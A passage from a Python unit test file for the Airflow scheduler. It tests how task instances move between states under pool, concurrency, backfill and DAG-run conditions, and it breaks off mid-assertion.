self.assertEqual(ti.state, State.RUNNING)
session.close()
class SchedulerJobTest(unittest.TestCase):
def setUp(self):
self.dagbag = DagBag()
with create_session() as session:
session.query(models.DagRun).delete()
session.query(errors.ImportError).delete()
session.commit()
@staticmethod
def run_single_scheduler_loop_with_no_dags(dags_folder):
"""
Utility function that runs a single scheduler loop without actually
changing/scheduling any dags. This is useful to simulate the other side effects of
running a scheduler loop, e.g. to see what parse errors there are in the
dags_folder.
:param dags_folder: the directory to traverse
:type directory: str
"""
scheduler = SchedulerJob(
dag_id='this_dag_doesnt_exist', # We don't want to actually run anything
num_runs=1,
subdir=os.path.join(dags_folder))
scheduler.heartrate = 0
scheduler.run()
def _make_simple_dag_bag(self, dags):
return SimpleDagBag([SimpleDag(dag) for dag in dags])
def test_no_orphan_process_will_be_left(self):
empty_dir = mkdtemp()
current_process = psutil.Process()
old_children = current_process.children(recursive=True)
scheduler = SchedulerJob(subdir=empty_dir,
num_runs=1)
scheduler.executor = TestExecutor()
scheduler.run()
shutil.rmtree(empty_dir)
# Remove potential noise created by previous tests.
current_children = set(current_process.children(recursive=True)) - set(
old_children)
self.assertFalse(current_children)
def test_process_executor_events(self):
dag_id = "test_process_executor_events"
dag_id2 = "test_process_executor_events_2"
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
dag2 = DAG(dag_id=dag_id2, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
DummyOperator(dag=dag2, task_id=task_id_1)
dagbag1 = self._make_simple_dag_bag([dag])
dagbag2 = self._make_simple_dag_bag([dag2])
scheduler = SchedulerJob()
session = settings.Session()
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.QUEUED
session.merge(ti1)
session.commit()
executor = TestExecutor()
executor.event_buffer[ti1.key] = State.FAILED
scheduler.executor = executor
# dag bag does not contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag2)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.QUEUED)
# dag bag does contain dag_id
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.FAILED)
ti1.state = State.SUCCESS
session.merge(ti1)
session.commit()
executor.event_buffer[ti1.key] = State.SUCCESS
scheduler._process_executor_events(simple_dag_bag=dagbag1)
ti1.refresh_from_db()
self.assertEqual(ti1.state, State.SUCCESS)
def test_execute_task_instances_is_paused_wont_execute(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_is_paused_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
dr1.state = State.RUNNING
dagmodel = models.DagModel()
dagmodel.dag_id = dag_id
dagmodel.is_paused = True
session.merge(ti1)
session.merge(dr1)
session.add(dagmodel)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_execute_task_instances_no_dagrun_task_will_execute(self):
"""
Tests that tasks without dagrun still get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_no_dagrun_task_will_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
ti1 = TI(task1, DEFAULT_DATE)
ti1.state = State.SCHEDULED
ti1.execution_date = ti1.execution_date + datetime.timedelta(days=1)
session.merge(ti1)
session.commit()
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
def test_execute_task_instances_backfill_tasks_wont_execute(self):
"""
Tests that backfill tasks won't get executed.
"""
dag_id = 'SchedulerJobTest.test_execute_task_instances_backfill_tasks_wont_execute'
task_id_1 = 'dummy_task'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.run_id = BackfillJob.ID_PREFIX + '_blah'
ti1 = TI(task1, dr1.execution_date)
ti1.refresh_from_db()
ti1.state = State.SCHEDULED
session.merge(ti1)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
ti1.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti1.state)
def test_find_executable_task_instances_backfill_nodagrun(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_backfill_nodagrun'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr2.run_id = BackfillJob.ID_PREFIX + 'asdf'
ti_no_dagrun = TI(task1, DEFAULT_DATE - datetime.timedelta(days=1))
ti_backfill = TI(task1, dr2.execution_date)
ti_with_dagrun = TI(task1, dr1.execution_date)
# ti_with_paused
ti_no_dagrun.state = State.SCHEDULED
ti_backfill.state = State.SCHEDULED
ti_with_dagrun.state = State.SCHEDULED
session.merge(dr2)
session.merge(ti_no_dagrun)
session.merge(ti_backfill)
session.merge(ti_with_dagrun)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti_no_dagrun.key, res_keys)
self.assertIn(ti_with_dagrun.key, res_keys)
def test_find_executable_task_instances_pool(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_pool'
task_id_1 = 'dummy'
task_id_2 = 'dummydummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, pool='a')
task2 = DummyOperator(dag=dag, task_id=task_id_2, pool='b')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
tis = ([
TI(task1, dr1.execution_date),
TI(task2, dr1.execution_date),
TI(task1, dr2.execution_date),
TI(task2, dr2.execution_date)
])
for ti in tis:
ti.state = State.SCHEDULED
session.merge(ti)
pool = models.Pool(pool='a', slots=1, description='haha')
pool2 = models.Pool(pool='b', slots=100, description='haha')
session.add(pool)
session.add(pool2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(3, len(res))
res_keys = []
for ti in res:
res_keys.append(ti.key)
self.assertIn(tis[0].key, res_keys)
self.assertIn(tis[1].key, res_keys)
self.assertIn(tis[3].key, res_keys)
def test_nonexistent_pool(self):
dag_id = 'SchedulerJobTest.test_nonexistent_pool'
task_id = 'dummy_wrong_pool'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task = DummyOperator(dag=dag, task_id=task_id, pool="this_pool_doesnt_exist")
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr = scheduler.create_dag_run(dag)
ti = TI(task, dr.execution_date)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
session.commit()
self.assertEqual(0, len(res))
def test_find_executable_task_instances_none(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_none'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
scheduler.create_dag_run(dag)
session.commit()
self.assertEqual(0, len(scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)))
def test_find_executable_task_instances_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.RUNNING
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
res_keys = map(lambda x: x.key, res)
self.assertIn(ti2.key, res_keys)
ti2.state = State.RUNNING
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
def test_find_executable_task_instances_concurrency_queued(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_concurrency_queued'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id='dummy1')
task2 = DummyOperator(dag=dag, task_id='dummy2')
task3 = DummyOperator(dag=dag, task_id='dummy3')
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dag_run = scheduler.create_dag_run(dag)
ti1 = TI(task1, dag_run.execution_date)
ti2 = TI(task2, dag_run.execution_date)
ti3 = TI(task3, dag_run.execution_date)
ti1.state = State.RUNNING
ti2.state = State.QUEUED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
self.assertEqual(res[0].key, ti3.key)
def test_find_executable_task_instances_task_concurrency(self):
dag_id = 'SchedulerJobTest.test_find_executable_task_instances_task_concurrency'
task_id_1 = 'dummy'
task_id_2 = 'dummy2'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1, task_concurrency=2)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1_1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1_1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti2.state = State.RUNNING
ti1_2 = TI(task1, dr2.execution_date)
ti1_2.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti2)
session.merge(ti1_2)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
ti1_2.state = State.RUNNING
ti1_3 = TI(task1, dr3.execution_date)
ti1_3.state = State.SCHEDULED
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(0, len(res))
ti1_1.state = State.SCHEDULED
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(2, len(res))
ti1_1.state = State.RUNNING
ti1_2.state = State.SCHEDULED
ti1_3.state = State.SCHEDULED
session.merge(ti1_1)
session.merge(ti1_2)
session.merge(ti1_3)
session.commit()
res = scheduler._find_executable_task_instances(
dagbag,
states=[State.SCHEDULED],
session=session)
self.assertEqual(1, len(res))
def test_change_state_for_executable_task_instances_no_tis(self):
scheduler = SchedulerJob()
session = settings.Session()
res = scheduler._change_state_for_executable_task_instances(
[], [State.NONE], session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_no_tis_with_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__no_tis_with_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
ti3.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.RUNNING],
session)
self.assertEqual(0, len(res))
def test_change_state_for_executable_task_instances_none_state(self):
dag_id = 'SchedulerJobTest.test_change_state_for__none_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr3 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task1, dr2.execution_date)
ti3 = TI(task1, dr3.execution_date)
ti1.state = State.SCHEDULED
ti2.state = State.QUEUED
ti3.state = State.NONE
session.merge(ti1)
session.merge(ti2)
session.merge(ti3)
session.commit()
res = scheduler._change_state_for_executable_task_instances(
[ti1, ti2, ti3],
[State.NONE, State.SCHEDULED],
session)
self.assertEqual(2, len(res))
ti1.refresh_from_db()
ti3.refresh_from_db()
self.assertEqual(State.QUEUED, ti1.state)
self.assertEqual(State.QUEUED, ti3.state)
def test_enqueue_task_instances_with_queued_state(self):
dag_id = 'SchedulerJobTest.test_enqueue_task_instances_with_queued_state'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
session.merge(ti1)
session.commit()
with patch.object(BaseExecutor, 'queue_command') as mock_queue_command:
scheduler._enqueue_task_instances_with_queued_state(dagbag, [ti1])
mock_queue_command.assert_called()
def test_execute_task_instances_nothing(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_nothing'
task_id_1 = 'dummy'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=2)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
dagbag = SimpleDagBag([])
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti1.state = State.SCHEDULED
session.merge(ti1)
session.commit()
self.assertEqual(0, scheduler._execute_task_instances(dagbag, states=[State.SCHEDULED]))
def test_execute_task_instances(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_nonexistent_queue'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=3)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
session = settings.Session()
# create first dag run with 1 running and 1 queued
dr1 = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr1.execution_date)
ti2 = TI(task2, dr1.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.RUNNING
ti2.state = State.RUNNING
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(State.RUNNING, dr1.state)
self.assertEqual(
2,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING], session=session
)
)
# create second dag run
dr2 = scheduler.create_dag_run(dag)
ti3 = TI(task1, dr2.execution_date)
ti4 = TI(task2, dr2.execution_date)
ti3.refresh_from_db()
ti4.refresh_from_db()
# manually set to scheduled so we can pick them up
ti3.state = State.SCHEDULED
ti4.state = State.SCHEDULED
session.merge(ti3)
session.merge(ti4)
session.commit()
self.assertEqual(State.RUNNING, dr2.state)
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
# check that concurrency is respected
ti1.refresh_from_db()
ti2.refresh_from_db()
ti3.refresh_from_db()
ti4.refresh_from_db()
self.assertEqual(
3,
DAG.get_num_task_instances(
dag_id, dag.task_ids, states=[State.RUNNING, State.QUEUED], session=session
)
)
self.assertEqual(State.RUNNING, ti1.state)
self.assertEqual(State.RUNNING, ti2.state)
six.assertCountEqual(self, [State.QUEUED, State.SCHEDULED], [ti3.state, ti4.state])
self.assertEqual(1, res)
def test_execute_task_instances_limit(self):
dag_id = 'SchedulerJobTest.test_execute_task_instances_limit'
task_id_1 = 'dummy_task'
task_id_2 = 'dummy_task_2'
# important that len(tasks) is less than concurrency
# because before scheduler._execute_task_instances would only
# check the num tasks once so if concurrency was 3,
# we could execute arbitrarily many tasks in the second run
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, concurrency=16)
task1 = DummyOperator(dag=dag, task_id=task_id_1)
task2 = DummyOperator(dag=dag, task_id=task_id_2)
dagbag = self._make_simple_dag_bag([dag])
scheduler = SchedulerJob()
scheduler.max_tis_per_query = 3
session = settings.Session()
tis = []
for i in range(0, 4):
dr = scheduler.create_dag_run(dag)
ti1 = TI(task1, dr.execution_date)
ti2 = TI(task2, dr.execution_date)
tis.append(ti1)
tis.append(ti2)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.commit()
res = scheduler._execute_task_instances(dagbag, [State.SCHEDULED])
self.assertEqual(8, res)
for ti in tis:
ti.refresh_from_db()
self.assertEqual(State.QUEUED, ti.state)
@unittest.skipUnless("INTEGRATION" in os.environ,
"The test is flaky with nondeterministic result")
def test_change_state_for_tis_without_dagrun(self):
dag1 = DAG(dag_id='test_change_state_for_tis_without_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag1, owner='airflow')
DummyOperator(task_id='dummy_b', dag=dag1, owner='airflow')
dag2 = DAG(dag_id='test_change_state_for_tis_without_dagrun_dont_change', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag2, owner='airflow')
dag3 = DAG(dag_id='test_change_state_for_tis_without_dagrun_no_dagrun', start_date=DEFAULT_DATE)
DummyOperator(task_id='dummy', dag=dag3, owner='airflow')
session = settings.Session()
dr1 = dag1.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag2.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.state = State.SCHEDULED
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.state = State.SUCCESS
session.commit()
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.state = State.SCHEDULED
session.commit()
ti3 = TI(dag3.get_task('dummy'), DEFAULT_DATE)
ti3.state = State.SCHEDULED
session.merge(ti3)
session.commit()
dagbag = self._make_simple_dag_bag([dag1, dag2, dag3])
scheduler = SchedulerJob(num_runs=0)
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a = dr1.get_task_instance(task_id='dummy', session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
ti1b = dr1.get_task_instance(task_id='dummy_b', session=session)
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
ti2 = dr2.get_task_instance(task_id='dummy', session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
ti3.refresh_from_db(session=session)
self.assertEqual(ti3.state, State.NONE)
dr1.refresh_from_db(session=session)
dr1.state = State.FAILED
# why o why
session.merge(dr1)
session.commit()
scheduler._change_state_for_tis_without_dagrun(
simple_dag_bag=dagbag,
old_states=[State.SCHEDULED, State.QUEUED],
new_state=State.NONE,
session=session)
ti1a.refresh_from_db(session=session)
self.assertEqual(ti1a.state, State.SCHEDULED)
# don't touch ti1b
ti1b.refresh_from_db(session=session)
self.assertEqual(ti1b.state, State.SUCCESS)
# don't touch ti2
ti2.refresh_from_db(session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
def test_change_state_for_tasks_failed_to_execute(self):
dag = DAG(
dag_id='dag_id',
start_date=DEFAULT_DATE)
task = DummyOperator(
task_id='task_id',
dag=dag,
owner='airflow')
# If there's no left over task in executor.queued_tasks, nothing happens
session = settings.Session()
scheduler_job = SchedulerJob()
mock_logger = mock.MagicMock()
test_executor = TestExecutor()
scheduler_job.executor = test_executor
scheduler_job._logger = mock_logger
scheduler_job._change_state_for_tasks_failed_to_execute()
mock_logger.info.assert_not_called()
# Tasks failed to execute with QUEUED state will be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
key = 'dag_id', 'task_id', DEFAULT_DATE, 1
test_executor.queued_tasks[key] = 'value'
ti = TI(task, DEFAULT_DATE)
ti.state = State.QUEUED
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.SCHEDULED, ti.state)
# Tasks failed to execute with RUNNING state will not be set to SCHEDULED state.
session.query(TI).delete()
session.commit()
ti.state = State.RUNNING
session.merge(ti)
session.commit()
scheduler_job._change_state_for_tasks_failed_to_execute()
ti.refresh_from_db()
self.assertEqual(State.RUNNING, ti.state)
def test_execute_helper_reset_orphaned_tasks(self):
session = settings.Session()
dag = DAG(
'test_execute_helper_reset_orphaned_tasks',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
dr2 = dag.create_dagrun(run_id=BackfillJob.ID_PREFIX,
state=State.RUNNING,
execution_date=DEFAULT_DATE + datetime.timedelta(1),
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = State.SCHEDULED
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
ti2.state = State.SCHEDULED
session.commit()
processor = mock.MagicMock()
scheduler = SchedulerJob(num_runs=0)
executor = TestExecutor()
scheduler.executor = executor
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, State.NONE)
ti2 = dr2.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti2.state, State.SCHEDULED)
@parameterized.expand([
[State.UP_FOR_RETRY, State.FAILED],
[State.QUEUED, State.NONE],
[State.SCHEDULED, State.NONE],
[State.UP_FOR_RESCHEDULE, State.NONE],
])
def test_execute_helper_should_change_state_for_tis_without_dagrun(
self, initial_task_state, expected_task_state):
session = settings.Session()
dag = DAG(
'test_execute_helper_should_change_state_for_tis_without_dagrun',
start_date=DEFAULT_DATE,
default_args={'owner': 'owner1'})
with dag:
op1 = DummyOperator(task_id='op1')
# Create DAG run with FAILED state
dag.clear()
dr = dag.create_dagrun(run_id=DagRun.ID_PREFIX,
state=State.FAILED,
execution_date=DEFAULT_DATE,
start_date=DEFAULT_DATE,
session=session)
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
ti.state = initial_task_state
session.commit()
# Create scheduler and mock calls to processor. Run duration is set
# to a high value to ensure loop is entered. Poll interval is 0 to
# avoid sleep. Done flag is set to true to exist the loop immediately.
scheduler = SchedulerJob(num_runs=0, processor_poll_interval=0)
executor = TestExecutor()
executor.queued_tasks
scheduler.executor = executor
processor = mock.MagicMock()
processor.harvest_simple_dags.return_value = [dag]
processor.done = True
scheduler.processor_agent = processor
scheduler._execute_helper()
ti = dr.get_task_instance(task_id=op1.task_id, session=session)
self.assertEqual(ti.state, expected_task_state)
@provide_session
def evaluate_dagrun(
self,
dag_id,
expected_task_states, # dict of task_id: state
dagrun_state,
run_kwargs=None,
advance_execution_date=False,
session=None):
"""
Helper for testing DagRun states with simple two-task DAGS.
This is hackish: a dag run is created but its tasks are
run by a backfill.
"""
if run_kwargs is None:
run_kwargs = {}
scheduler = SchedulerJob()
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
if advance_execution_date:
# run a second time to schedule a dagrun after the start_date
dr = scheduler.create_dag_run(dag)
ex_date = dr.execution_date
try:
dag.run(start_date=ex_date, end_date=ex_date, **run_kwargs)
except AirflowException:
pass
# test tasks
for task_id, expected_state in expected_task_states.items():
task = dag.get_task(task_id)
ti = TI(task, ex_date)
ti.refresh_from_db()
self.assertEqual(ti.state, expected_state)
# load dagrun
dr = DagRun.find(dag_id=dag_id, execution_date=ex_date)
dr = dr[0]
dr.dag = dag
self.assertEqual(dr.state, dagrun_state)
def test_dagrun_fail(self):
"""
DagRuns with one failed and one incomplete root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_fail',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.UPSTREAM_FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_success(self):
"""
DagRuns with one failed and one successful root task -> SUCCESS
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_success',
expected_task_states={
'test_dagrun_fail': State.FAILED,
'test_dagrun_succeed': State.SUCCESS,
},
dagrun_state=State.SUCCESS)
def test_dagrun_root_fail(self):
"""
DagRuns with one successful and one failed root task -> FAILED
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_root_fail',
expected_task_states={
'test_dagrun_succeed': State.SUCCESS,
'test_dagrun_fail': State.FAILED,
},
dagrun_state=State.FAILED)
def test_dagrun_root_fail_unfinished(self):
"""
DagRuns with one unfinished and one failed root task -> RUNNING
"""
# Run both the failed and successful tasks
scheduler = SchedulerJob()
dag_id = 'test_dagrun_states_root_fail_unfinished'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
dr = scheduler.create_dag_run(dag)
try:
dag.run(start_date=dr.execution_date, end_date=dr.execution_date)
except AirflowException: # Expect an exception since there is a failed task
pass
# Mark the successful task as never having run since we want to see if the
# dagrun will be in a running state despite haveing an unfinished task.
with create_session() as session:
ti = dr.get_task_instance('test_dagrun_unfinished', session=session)
ti.state = State.NONE
session.commit()
dr_state = dr.update_state()
self.assertEqual(dr_state, State.RUNNING)
def test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date(self):
"""
DagRun is marked a success if ignore_first_depends_on_past=True
Test that an otherwise-deadlocked dagrun is marked as a success
if ignore_first_depends_on_past=True and the dagrun execution_date
is after the start_date.
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
advance_execution_date=True,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_dagrun_deadlock_ignore_depends_on_past(self):
"""
Test that ignore_first_depends_on_past doesn't affect results
(this is the same test as
test_dagrun_deadlock_ignore_depends_on_past_advance_ex_date except
that start_date == execution_date so depends_on_past is irrelevant).
"""
self.evaluate_dagrun(
dag_id='test_dagrun_states_deadlock',
expected_task_states={
'test_depends_on_past': State.SUCCESS,
'test_depends_on_past_2': State.SUCCESS,
},
dagrun_state=State.SUCCESS,
run_kwargs=dict(ignore_first_depends_on_past=True))
def test_scheduler_start_date(self):
"""
Test that the scheduler respects start_dates, even when DAGS have run
"""
with create_session() as session:
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > datetime.datetime.utcnow())
scheduler = SchedulerJob(dag_id,
num_runs=2)
scheduler.run()
# zero tasks ran
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 0)
session.commit()
# previously, running this backfill would kick off the Scheduler
# because it would take the most recent run and start from there
# That behavior still exists, but now it will only do so if after the
# start date
backfill = BackfillJob(
dag=dag,
start_date=DEFAULT_DATE,
end_date=DEFAULT_DATE)
backfill.run()
# one task ran
self.assertEqual(
